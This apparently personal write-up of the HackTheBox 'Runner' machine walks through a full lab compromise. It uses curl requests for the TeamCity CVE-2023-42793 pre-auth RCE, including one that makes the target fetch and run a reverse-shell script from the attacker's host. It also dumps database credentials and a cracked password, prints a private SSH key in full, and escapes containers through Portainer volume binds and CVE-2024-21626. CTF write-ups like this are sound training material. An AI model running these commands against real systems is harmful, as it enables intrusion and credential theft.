# Runner - HTB

[[_TOC_]]

## Summary

<!-- markdownlint-disable MD033 -->
<div align="center"><img src="images/0.png"></div>

Runner is a fun medium-rated HTB machine created by [TheCyberGeek](https://x.com/TheCyberGeek19)

The user involves a Pre-auth RCE in TeamCity (CVE-2023-42793) to get RCE and leak user keys and credentials.  
For root, we can create a volume mount with controlled bind path and map it to a container. Alternatively, we can abuse CVE-2024-21626.

## Initial recon

```console
opcode@debian$ nmap -v -p- --min-rate 2000 10.10.11.13
Nmap scan report for 10.10.11.13
Host is up (0.16s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8000/tcp open  http-alt
```

```console
opcode@debian$ nmap -sC -sV -p 22,80,8000 -oN runner.nmap 10.10.11.13
Nmap scan report for 10.10.11.13
Host is up (0.16s latency).

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3eea454bc5d16d6fe2d4d13b0a3da94f (ECDSA)
|_  256 64cc75de4ae6a5b473eb3f1bcfb4e394 (ED25519)
80/tcp   open  http        nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://runner.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
8000/tcp open  nagios-nsca Nagios NSCA
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

The ports 22 (SSH), 80 (HTTP), and 8000 (HTTP) are open.  
The HTTP port 80 redirects to <http://runner.htb/>
Therefore, update `/etc/hosts`:

```text
10.10.11.13 runner.htb
```

I enumerated the subdomains and routes on port 80 using `ffuf`, but nothing came out.  
On the port 8000, some routes can be retrieved:

```console
opcode@debian$ ffuf -c -w ~/CTF/wordlists/raft-small-words.txt -u 'http://runner.htb:8000/FUZZ' -r -mc all -fc 404 -v 2>/dev/null

[Status: 200, Size: 3, Words: 1, Lines: 2, Duration: 267ms]
| URL | http://runner.htb:8000/health
    * FUZZ: health

[Status: 200, Size: 9, Words: 1, Lines: 1, Duration: 160ms]
| URL | http://runner.htb:8000/version
    * FUZZ: version
```

They don't make any sense, though:

```console
opcode@debian$ curl http://runner.htb:8000/health
OK
opcode@debian$ curl http://runner.htb:8000/version
0.0.0-src
```

On port 80, the subdomain `teamcity.runner.htb` is present but missed because it is not in `subdomains-top1million-20000.txt` wordlist. TeamCity is mentioned on the webpage, though; [CeWL](https://github.com/digininja/CeWL) would have found it.  
Update `/etc/hosts`:

```text
10.10.11.13 runner.htb teamcity.runner.htb
```

## Pre-auth RCE in TeamCity: CVE-2023-42793

<http://teamcity.runner.htb/> leads to a TeamCity login page as expected:

![1](images/1.png)

The version is 2023.05.3 (build 129390). It is vulnerable to CVE-2023-42793  
The PRIOn Team have a good blog on this vulnerability: [CVE-2023-42793 - Attacking & Defending JetBrains TeamCity](https://www.prio-n.com/blog/cve-2023-42793-attacking-defending-JetBrains-TeamCity)

This vulnerability allows any request ending with `/RPC2` to bypass authorization.  
The initial user generated during installation holds administrator privileges and is assigned the ID 1. For such a user, the attacker can create an authentication token via the POST request `/app/rest/users/<userLocator>/tokens/RPC2`.

```console
opcode@debian$ curl -XPOST 'http://teamcity.runner.htb/app/rest/users/id:1/tokens/RPC2' -H 'Content-Length: 0'
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><token name="RPC2" creationTime="2024-08-20T23:14:08.566Z" value="eyJ0eXAiOiAiVENWMiJ9.LTA5ZU1lQ3FIOVlDaXprSW9Tbm9xQzhUZzNN.YmZhNDFhMTEtY2Y4ZS00NzdkLTlhZTktZTk1MjJhYTAzOGFl"/>
```

The obtained access token can be used to enable the debug API endpoint (administrator privileges are needed, but the user with ID 1 is likely to have those privileges):

```console
opcode@debain$ curl -XPOST 'http://teamcity.runner.htb/admin/dataDir.html?action=edit&fileName=config/internal.properties&content=rest.debug.processes.enable=true' -H 'Authorization: Bearer eyJ0eXAiOiAiVENWMiJ9.LTA5ZU1lQ3FIOVlDaXprSW9Tbm9xQzhUZzNN.YmZhNDFhMTEtY2Y4ZS00NzdkLTlhZTktZTk1MjJhYTAzOGFl' -H 'Content-Type: text/plain' -H 'Content-Length: 0'
```

Once enabled, the debug API endpoint can be used to run arbitrary commands:

```console
opcode@debian$ curl -XPOST 'http://teamcity.runner.htb/app/rest/debug/processes?exePath=id' -H 'Authorization: Bearer eyJ0eXAiOiAiVENWMiJ9.LTA5ZU1lQ3FIOVlDaXprSW9Tbm9xQzhUZzNN.YmZhNDFhMTEtY2Y4ZS00NzdkLTlhZTktZTk1MjJhYTAzOGFl' -H 'Content-Type: text/plain' -H 'Content-Length: 0'
StdOut:uid=1000(tcuser) gid=1000(tcuser) groups=1000(tcuser)

StdErr: 
Exit code: 0
Time: 28ms
```

To get a shell, I had to rely on a weird approach, as pipes did not work.  
First, download a bash file containing the reverse shell to the disk:

```console
opcode@debian$ curl -XPOST 'http://teamcity.runner.htb/app/rest/debug/processes?exePath=curl&params=http://10.10.14.185:8000/revshell.sh&params=-o&params=/tmp/revshell.sh' -H 'Authorization: Bearer eyJ0eXAiOiAiVENWMiJ9.LTA5ZU1lQ3FIOVlDaXprSW9Tbm9xQzhUZzNN.YmZhNDFhMTEtY2Y4ZS00NzdkLTlhZTktZTk1MjJhYTAzOGFl' -H 'Content-Type: text/plain' -H 'Content-Length: 0'
```

Then, change its permissions to have `+x`

```console
opcode@debian$ curl -XPOST 'http://teamcity.runner.htb/app/rest/debug/processes?exePath=chmod&params=%2bx&params=/tmp/revshell.sh' -H 'Authorization: Bearer eyJ0eXAiOiAiVENWMiJ9.LTA5ZU1lQ3FIOVlDaXprSW9Tbm9xQzhUZzNN.YmZhNDFhMTEtY2Y4ZS00NzdkLTlhZTktZTk1MjJhYTAzOGFl' -H 'Content-Type: text/plain' -H 'Content-Length: 0'
```

Finally, execute.

```console
opcode@debian$ curl -XPOST 'http://teamcity.runner.htb/app/rest/debug/processes?exePath=/tmp/revshell.sh' -H 'Authorization: Bearer eyJ0eXAiOiAiVENWMiJ9.LTA5ZU1lQ3FIOVlDaXprSW9Tbm9xQzhUZzNN.YmZhNDFhMTEtY2Y4ZS00NzdkLTlhZTktZTk1MjJhYTAzOGFl' -H 'Content-Type: text/plain' -H 'Content-Length: 0'
```

Stabilize the shell:

```console
tcuser@647a82f29ca0:~$ python3 -c 'import pty;pty.spawn("/bin/bash");'
tcuser@647a82f29ca0:~$ ^Z
[1]  + 3834 suspended  nc -lnvp 9001
opcode@debian$ stty raw -echo; fg
stty rows 24 cols 80
export TERM=xterm-256color
exec /bin/bash
```

## Container enumeration

[miniss](https://github.com/noraj/miniss) did not find any other ports:

```console
tcuser@647a82f29ca0:/tmp$ ./miniss 
type local address    remote address    state       username (uid)
tcp  127.0.0.1:8105   0.0.0.0:0         LISTEN      tcuser (1000)
tcp  0.0.0.0:8111     0.0.0.0:0         LISTEN      tcuser (1000)
tcp  172.17.0.2:58890 10.10.14.196:9001 ESTABLISHED tcuser (1000)
tcp  [::]:5005        [::]:0            LISTEN      tcuser (1000)
```

`linpeas.sh` pointed to some bash scripts, but that did not lead me anywhere.  
It also highlighted the `JDWP` protocol: `jdwp=transport=dt_socket,server=y,suspend=n,address=*:5005`. I ran [jdwp-shellifier](https://github.com/hugsy/jdwp-shellifier) but did not get RCE.

I used [deepce](https://github.com/stealthcopter/deepce) next:

```console
tcuser@647a82f29ca0:/tmp$ ./deepce.sh 
[--SNIP--]
[+] Dangerous Capabilities .. Yes
Bounding set =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap
```

The `cap_dac_override` and `cap_mknod` were marked with red background.  
However, `CAP_DAC_OVERRIDE` needs `CAP_DAC_READ_SEARCH` alongside itself for docker escape to be possible with [Shocker](<https://github.com/gabrtv/shocker>)  
I could not find reliable resources to abuse `cap_mknod`  
I also ran `cdk eva` with [cdk](https://github.com/cdk-team/CDK) but found nothing.

I transferred a [statically-linked nmap binary](https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/nmap) to scan for open ports on other containers as well as on host in the default bridge network.

```console
tcuser@647a82f29ca0:/tmp$ cat /etc/hosts
127.0.0.1	localhost
::1	localhost ip6-localhost ip6-loopback
fe00::0	ip6-localnet
ff00::0	ip6-mcastprefix
ff02::1	ip6-allnodes
ff02::2	ip6-allrouters
172.17.0.2	647a82f29ca0
```

```console
tcuser@647a82f29ca0:/tmp$ ./nmap -v -p- 172.17.0.1/29

Nmap scan report for 172.17.0.1
Host is up (0.00075s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8000/tcp open  unknown

Nmap scan report for 647a82f29ca0 (172.17.0.2)
Host is up (0.036s latency).
Not shown: 65533 closed ports
PORT      STATE SERVICE
8111/tcp  open  unknown
38921/tcp open  unknown
```

## Retrieving credentials and private keys from TeamCity

Finally, I used [trufflehog](https://github.com/trufflesecurity/trufflehog)

```console
tcuser@647a82f29ca0:/tmp$ curl 10.10.14.196:8000/trufflehog_3.73.0_linux_amd64.tar.gz -o trufflehog_3.73.0_linux_amd64.tar.gz
tcuser@647a82f29ca0:/tmp$ tar -xvf trufflehog_3.73.0_linux_amd64.tar.gz
tcuser@647a82f29ca0:/tmp$ ./trufflehog filesystem /opt/teamcity /data
[--SNIP--]
⚠️ Found result - unable to verify due to error 🐷🔑❗️
Verification Error: verification failures: dial tcp: lookup gitlab.com: i/o timeout, dial tcp: lookup github.com: i/o timeout, Get "https://keychecker.trufflesecurity.com/fingerprint/c715f3dab7f32de7125802b317815b233ae337c0": GET https://keychecker.trufflesecurity.com/fingerprint/c715f3dab7f32de7125802b317815b233ae337c0 giving up after 4 attempt(s): Get "https://keychecker.trufflesecurity.com/fingerprint/c715f3dab7f32de7125802b317815b233ae337c0": dial tcp: lookup keychecker.trufflesecurity.com on 8.8.8.8:53: read udp 172.17.0.2:49369->8.8.8.8:53: i/o timeout
Detector Type: PrivateKey
Decoder Type: PLAIN
Raw result: -----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAlk2rRhm7T2dg2z3+Y6ioSOVszvNlA4wRS4ty8qrGMSCpnZyEISPl
htHGpTu0oGI11FTun7HzQj7Ore7YMC+SsMIlS78MGU2ogb0Tp2bOY5RN1/X9MiK/SE4liT
njhPU1FqBIexmXKlgS/jv57WUtc5CsgTUGYkpaX6cT2geiNqHLnB5QD+ZKJWBflF6P9rTt
zkEdcWYKtDp0Phcu1FUVeQJOpb13w/L0GGiya2RkZgrIwXR6l3YCX+mBRFfhRFHLmd/lgy
/R2GQpBWUDB9rUS+mtHpm4c3786g11IPZo+74I7BhOn1Iz2E5KO0tW2jefylY2MrYgOjjq
5fj0Fz3eoj4hxtZyuf0GR8Cq1AkowJyDP02XzIvVZKCMDgVNAMH5B7COTX8CjUzc0vuKV5
iLSi+vRx6vYQpQv4wlh1H4hUlgaVSimoAqizJPUqyAi9oUhHXGY71x5gCUXeULZJMcDYKB
Z2zzex3+iPBYi9tTsnCISXIvTDb32fmm1qRmIRyXAAAFgGL91WVi/dVlAAAAB3NzaC1yc2
EAAAGBAJZNq0YZu09nYNs9/mOoqEjlbM7zZQOMEUuLcvKqxjEgqZ2chCEj5YbRxqU7tKBi
NdRU7p+x80I+zq3u2DAvkrDCJUu/DBlNqIG9E6dmzmOUTdf1/TIiv0hOJYk544T1NRagSH
sZlypYEv47+e1lLXOQrIE1BmJKWl+nE9oHojahy5weUA/mSiVgX5Rej/a07c5BHXFmCrQ6
dD4XLtRVFXkCTqW9d8Py9BhosmtkZGYKyMF0epd2Al/pgURX4URRy5nf5YMv0dhkKQVlAw
fa1EvprR6ZuHN+/OoNdSD2aPu+COwYTp9SM9hOSjtLVto3n8pWNjK2IDo46uX49Bc93qI+
IcbWcrn9BkfAqtQJKMCcgz9Nl8yL1WSgjA4FTQDB+Qewjk1/Ao1M3NL7ileYi0ovr0cer2
EKUL+MJYdR+IVJYGlUopqAKosyT1KsgIvaFIR1xmO9ceYAlF3lC2STHA2CgWds83sd/ojw
WIvbU7JwiElyL0w299n5ptakZiEclwAAAAMBAAEAAAGABgAu1NslI8vsTYSBmgf7RAHI4N
BN2aDndd0o5zBTPlXf/7dmfQ46VTId3K3wDbEuFf6YEk8f96abSM1u2ymjESSHKamEeaQk
lJ1wYfAUUFx06SjchXpmqaPZEsv5Xe8OQgt/KU8BvoKKq5TIayZtdJ4zjOsJiLYQOp5oh/
1jCAxYnTCGoMPgdPKOjlViKQbbMa9e1g6tYbmtt2bkizykYVLqweo5FF0oSqsvaGM3MO3A
Sxzz4gUnnh2r+AcMKtabGye35Ax8Jyrtr6QAo/4HL5rsmN75bLVMN/UlcCFhCFYYRhlSay
yeuwJZVmHy0YVVjxq3d5jiFMzqJYpC0MZIj/L6Q3inBl/Qc09d9zqTw1wAd1ocg13PTtZA
mgXIjAdnpZqGbqPIJjzUYua2z4mMOyJmF4c3DQDHEtZBEP0Z4DsBCudiU5QUOcduwf61M4
CtgiWETiQ3ptiCPvGoBkEV8ytMLS8tx2S77JyBVhe3u2IgeyQx0BBHqnKS97nkckXlAAAA
wF8nu51q9C0nvzipnnC4obgITpO4N7ePa9ExsuSlIFWYZiBVc2rxjMffS+pqL4Bh776B7T
PSZUw2mwwZ47pIzY6NI45mr6iK6FexDAPQzbe5i8gO15oGIV9MDVrprjTJtP+Vy9kxejkR
3np1+WO8+Qn2E189HvG+q554GQyXMwCedj39OY71DphY60j61BtNBGJ4S+3TBXExmY4Rtg
lcZW00VkIbF7BuCEQyqRwDXjAk4pjrnhdJQAfaDz/jV5o/cAAAAMEAugPWcJovbtQt5Ui9
WQaNCX1J3RJka0P9WG4Kp677ZzjXV7tNufurVzPurrxyTUMboY6iUA1JRsu1fWZ3fTGiN/
TxCwfxouMs0obpgxlTjJdKNfprIX7ViVrzRgvJAOM/9WixaWgk7ScoBssZdkKyr2GgjVeE
7jZoobYGmV2bbIDkLtYCvThrbhK6RxUhOiidaN7i1/f1LHIQiA4+lBbdv26XiWOw+prjp2
EKJATR8rOQgt3xHr+exgkGwLc72Q61AAAAwQDO2j6MT3aEEbtgIPDnj24W0xm/r+c3LBW0
axTWDMGzuA9dg6YZoUrzLWcSU8cBd+iMvulqkyaGud83H3C17DWLKAztz7pGhT8mrWy5Ox
KzxjsB7irPtZxWmBUcFHbCrOekiR56G2MUCqQkYfn6sJ2v0/Rp6PZHNScdXTMDEl10qtAW
QHkfhxGO8gimrAvjruuarpItDzr4QcADDQ5HTU8PSe/J2KL3PY7i4zWw9+/CyPd0t9yB5M
KgK8c9z2ecgZsAAAALam9obkBydW5uZXI=
-----END OPENSSH PRIVATE KEY-----
File: /data/teamcity_server/datadir/config/projects/AllProjects/pluginData/ssh_keys/id_rsa
```

There were too many false positives, but it brought back something handy at the end.

Furthermore, Teamcity must use a database, but we don't see standard ports in use. To understand that, I read through <https://www.jetbrains.com/help/teamcity/set-up-external-database.html>.  
To figure out the database, we can check `teamcity-server.log`

```console
tcuser@647a82f29ca0:~$ cat /opt/teamcity/logs/teamcity-server.log | grep SQL | head -n 2
[2024-02-28 10:37:01,492]   INFO -  jetbrains.buildServer.STARTUP - JDBC driver version: 2.3 (HSQL Database Engine Driver)
[2024-02-28 10:37:01,492]   INFO -  jetbrains.buildServer.STARTUP - Database system version: 2.3.2 (HSQL Database Engine)
```

Also,

```console
tcuser@647a82f29ca0:/data/teamcity_server/datadir/config$ cat database.properties 
#Wed Feb 28 10:37:02 GMT 2024
connectionUrl=jdbc\:hsqldb\:file\:$TEAMCITY_SYSTEM_PATH/buildserver
```

The `$TEAMCITY_SYSTEM_PATH` is not known, but with a bit of googling, we'd find it to be `/data/teamcity_server/datadir/system`
With more googling, I learnt about `hsqldb.jar`, which can act as a client.

```console
tcuser@647a82f29ca0:~$ find / -type f -name "*hsqldb*" 2>/dev/null
/opt/teamcity/webapps/ROOT/WEB-INF/lib/hsqldb.jar
/opt/teamcity/webapps/ROOT/WEB-INF/lib/hsqldb1.jar
/data/teamcity_server/datadir/config/database.hsqldb.properties.dist
```

I tried using it, but it errored out. So I downloaded `hsqldb.jar` from <https://hsqldb.org/download/hsqldb_270/> and transferred it to the box.  
First, I created `sqltool.rc` with the contents:

```text
# sqltool.rc

urlid buildserver
url jdbc:hsqldb:file:/data/teamcity_server/datadir/system/buildserver;shutdown=true
username sa
password
```

Then I transferred all necessary files inside `/tmp`:

```console
tcuser@647a82f29ca0:/tmp$ curl 10.10.14.107:8000/sqltool.rc -o sqltool.rc
tcuser@647a82f29ca0:/tmp$ curl 10.10.14.107:8000/hsqldb-2.7.0.jar -o hsqldb-2.7.0.jar
tcuser@647a82f29ca0:/tmp$ curl 10.10.14.107:8000/sqltool-2.7.0.jar -o sqltool-2.7.0.jar
```

`sqltool.jar` can now be used:

```console
tcuser@647a82f29ca0:/tmp$ java -jar /tmp/sqltool-2.7.0.jar --rcFile /tmp/sqltool.rc buildserver
NOTE: Picked up JDK_JAVA_OPTIONS:  --add-opens jdk.management/com.sun.management.internal=ALL-UNNAMED -XX:+IgnoreUnrecognizedVMOptions --add-opens=java.base/java.lang=ALL-UNNAMED --add-opens=java.base/java.io=ALL-UNNAMED --add-opens=java.base/java.util=ALL-UNNAMED --add-opens=java.base/java.util.concurrent=ALL-UNNAMED --add-opens=java.rmi/sun.rmi.transport=ALL-UNNAMED
SqlTool v. 6559.
Failed to get a connection to 'jdbc:hsqldb:file:/data/teamcity_server/datadir/system/buildserver;shutdown=true' as user "sa".
Cause: Database lock acquisition failure: lockFile: org.hsqldb.persist.LockFile@fd749e3f[file =/data/teamcity_server/datadir/system/buildserver.lck, exists=true, locked=false, valid=false, ] method: checkHeartbeat read: 2024-04-23 18:49:08 heartbeat - read: -7991 ms.
```

It is a database lock acquisition failure, like the one I encountered on the retired machine [Bizness](../Bizness/README.md).  
It has become a common theme with embedded databases. The only workaround I know involves bringing down the TeamCity server and freeing the lock.

```console
tcuser@647a82f29ca0:/tmp$ /opt/teamcity/bin/shutdown.sh
tcuser@647a82f29ca0:/tmp$ java -jar /tmp/sqltool-2.7.0.jar --rcFile /tmp/sqltool.rc buildserver
```

It works now.

```console
sql> \dt
TABLE_SCHEM  TABLE_NAME
-----------  -----------------------------
PUBLIC       ACTION_HISTORY
PUBLIC       AGENT
PUBLIC       AGENT_POOL
[--SNIP--]
PUBLIC       USERS
PUBLIC       USER_BLOCKS
[--SNIP--]
```

The `USERS` database should hold credentials.

```console
sql> \d USERS
NAME                  DATATYPE  WIDTH  NO-NULLS  PRECISION  SCALE
--------------------  --------  -----  --------  ---------  -----
ID                    BIGINT       20  *                64       
USERNAME              VARCHAR      60  *                60       
PASSWORD              VARCHAR     128                  128       
NAME                  VARCHAR     256                  256       
EMAIL                 VARCHAR     256                  256       
LAST_LOGIN_TIMESTAMP  BIGINT       20                   64       
ALGORITHM             VARCHAR      20                   20       
```

```console
sql> select * from USERS;
ID  USERNAME  PASSWORD                                                      NAME     EMAIL               LAST_LOGIN_TIMESTAMP  ALGORITHM
--  --------  ------------------------------------------------------------  -------  ------------------  --------------------  ---------
 1  admin     $2a$07$neV5T/BlEDiMQUs.gM1p4uYl8xl8kvNUo4/8Aja2sAWHAQLWqufye  John     john@runner.htb            1713894047885  BCRYPT
 2  matthew   $2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/YPHbD48/JQsdGLulmeVo.Em  Matthew  matthew@runner.htb         1709150421438  BCRYPT
```

Victory :). I tried cracking them with `john`, and the password for `matthew` cracked:

```text
matthew:piper123
```

It was the complicated approach to solving the machine. The intended approach is a lot easier.  
CVE-2023-42793 generates the user's authentication token with ID 1, which holds administrator privileges. That token can also be used to add new user accounts with elevated roles to TeamCity.  
<https://github.com/H454NSec/CVE-2023-42793> is a PoC that does the same.

```console
opcode@debian$ wget https://raw.githubusercontent.com/H454NSec/CVE-2023-42793/main/CVE-2023-42793.py
opcode@debian$ python3 CVE-2023-42793.py -u http://teamcity.runner.htb
[+] http://teamcity.runner.htb/login.html [H454NSec8265:@H454NSec]
```

Those credentials can be used to log in to the dashboard.  
On the dashboard, there are no jobs or registered agents. However, `Administration` > `Backup` can be used to back up and download everything.

![2](images/2.png)

## Portainer - Creating volume mount with controlled bind path

The obtained RSA private key can SSH to the host:

```console
opcode@debian$ chmod 600 id_rsa
opcode@debian$ ssh -i id_rsa john@runner.htb
```

Once again, I ran `miniss`:

```console
john@runner:~$ ./miniss 
type local address       remote address     state       username (uid)
tcp  127.0.0.1:8111      0.0.0.0:0          LISTEN      root (0)
tcp  127.0.0.1:9443      0.0.0.0:0          LISTEN      root (0)
tcp  127.0.0.53:53       0.0.0.0:0          LISTEN      systemd-resolve (102)
tcp  0.0.0.0:22          0.0.0.0:0          LISTEN      root (0)
tcp  0.0.0.0:80          0.0.0.0:0          LISTEN      root (0)
tcp  127.0.0.1:5005      0.0.0.0:0          LISTEN      root (0)
tcp  127.0.0.1:9000      0.0.0.0:0          LISTEN      root (0)
tcp  10.129.118.42:22    10.10.14.107:53808 ESTABLISHED root (0)
tcp  [::]:8000           [::]:0             LISTEN      root (0)
tcp  [::]:22             [::]:0             LISTEN      root (0)
tcp  [::]:80             [::]:0             LISTEN      root (0)
udp  10.129.118.42:48847 8.8.8.8:53         ESTABLISHED systemd-resolve (102)
udp  10.129.118.42:40830 8.8.8.8:53         ESTABLISHED systemd-resolve (102)
udp  127.0.0.53:53       0.0.0.0:0          CLOSE       systemd-resolve (102)
udp  0.0.0.0:68          0.0.0.0:0          CLOSE       root (0)
udp  127.0.0.1:53820     127.0.0.53:53      ESTABLISHED systemd-timesync (104)
udp  10.129.118.42:58669 8.8.8.8:53         ESTABLISHED systemd-resolve (102)
udp  10.129.118.42:34126 8.8.8.8:53         ESTABLISHED systemd-resolve (102)
```

There are several ports whose purpose has yet to be discovered.  
`linpeas` also found some oddities:

```text
╔══════════╣ Container related tools present (if any):
/usr/bin/docker
/usr/bin/runc
```

```console
john@runner:~$ cat /proc/mounts | grep hidepid
proc /proc proc rw,nosuid,nodev,noexec,relatime,hidepid=invisible 0 0
```

`/proc` has been mounted with the `hidepid=2` option, implying `pspy` cannot be used.  

```console
john@runner:~$ cat /etc/passwd | grep sh$
root:x:0:0:root:/root:/bin/bash
matthew:x:1000:1000:,,,:/home/matthew:/bin/bash
john:x:1001:1001:,,,:/home/john:/bin/bash
```

Besides `john`, matthew is another user. However, the password `piper123` did not work.

```console
john@runner:~$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 runner runner.htb teamcity.runner.htb portainer-administration.runner.htb

# The following lines are desirable for IPv6 capable hosts
::1     ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
```

Another subdomain is present in `/etc/hosts`. It is also there in nginx config:

```console
john@runner:~$ cat /etc/nginx/sites-enabled/default | grep -v '#' | awk 'NF'
server {
	listen 80 default_server;
	listen [::]:80 default_server;
	root /var/www/html;
	index index.html index.htm index.nginx-debian.html;
	server_name runner.htb;
	location / {
		try_files $uri $uri/ =404;
	}
	if ($host != runner.htb) {
		rewrite ^ http://runner.htb/;
	}
}

john@runner:~$ cat /etc/nginx/sites-enabled/teamcity | grep -v '#' | awk 'NF'
server {
    listen 80;
    server_name teamcity.runner.htb;
    location / {
        proxy_pass http://localhost:8111;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        proxy_set_header X-Forwarded-Proto $scheme;
        proxy_buffering off;
        proxy_request_buffering off;
        proxy_http_version 1.1;
        proxy_intercept_errors on;
    }
}
  
john@runner:~$ cat /etc/nginx/sites-enabled/portainer | grep -v '#' | awk 'NF'
server {
    listen 80;
    server_name portainer-administration.runner.htb;
    location / {
        proxy_pass https://localhost:9443;
        proxy_http_version 1.1;
        proxy_set_header Upgrade $http_upgrade;
        proxy_set_header Connection 'upgrade';
        proxy_set_header Host $host;
        proxy_cache_bypass $http_upgrade;
    }
}
```

Update `/etc/hosts` once again:

```text
10.10.11.13 runner.htb teamcity.runner.htb portainer-administration.runner.htb
```

<http://portainer-administration.runner.htb/> leads to the login page for `portainer.io`

![3](images/3.png)

The credentials obtained from TeamCity HSQL Database, `matthew:piper123`, work here.  
Once logged in, we can spin up our own containers.  
Since HTB boxes can't reach the internet, I found a couple of existing images at <http://portainer-administration.runner.htb/#!/1/docker/images>:

- ubuntu:latest
- teamcity:latest

I added a container from <http://portainer-administration.runner.htb/#!/1/docker/containers/new>.  
For the image, I chose `ubuntu:latest` and set console to interactive and tty (it immediately dies otherwise)  
In the command option, I tried adding `--privileged`, but that failed.  
The container spawned with root privileges.  
There was no `curl` or `wget` on the box, so I had to use a neat alternative:

```bash
function __curl() {
  read proto server path <<<$(echo ${1//// })
  DOC=/${path// //}
  HOST=${server//:*}
  PORT=${server//*:}
  [[ x"${HOST}" == x"${PORT}" ]] && PORT=80

  exec 3<>/dev/tcp/${HOST}/$PORT
  echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >&3
  (while read line; do
   [[ "$line" == $'\r' ]] && break
  done && cat) <&3
  exec 3>&-
}
```

After that, I enumerated the container with `deepce.sh` and `cdk`, but nothing unusual was present.

I also tried going for mounts, but they've restricted us to only volume mounts. It makes sense as bind mount would allow access to the host's filesystem.  
However, under the surface, a volume mount is also a bind mount, except it is bound to `/var/lib/docker/volumes`  
I found a stackoverflow answer detailing all that: <https://stackoverflow.com/questions/77372045/can-a-docker-volume-also-be-a-bind-mount>

Therefore, when we add a new volume from <http://portainer-administration.runner.htb/#!/1/docker/volumes/new>, we can use the `add driver option` to bind the volume mount to a controlled location.

```js
type: 'none'
o: 'bind'
device: '/root'
```

![4](images/4.png)

Now, we can map this volume while deploying a container. Then we can connect to a console and read the flag in `/home`:

![5](images/5.png)

![6](images/6.png)

![7](images/7.png)

```console
root@30d8d46c2b91:/# cd /home/
root@30d8d46c2b91:/home# ls
docker_clean.sh  initial_state.txt  monitor.sh  root.txt
```

Alternatively, [CVE-2024-21626](https://nitroc.org/en/posts/cve-2024-21626-illustrated/) could also have been used to read the flag.  
When creating a container, set the working directory to `/proc/self/fd/8`

![8](images/8.png)

Attach a console to this container and access the host filesystem with some path traversal:

```console
root@ab40d151d0a3:.# ls ../../../root
job-working-directory: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
docker_clean.sh  initial_state.txt  monitor.sh  root.txt
```
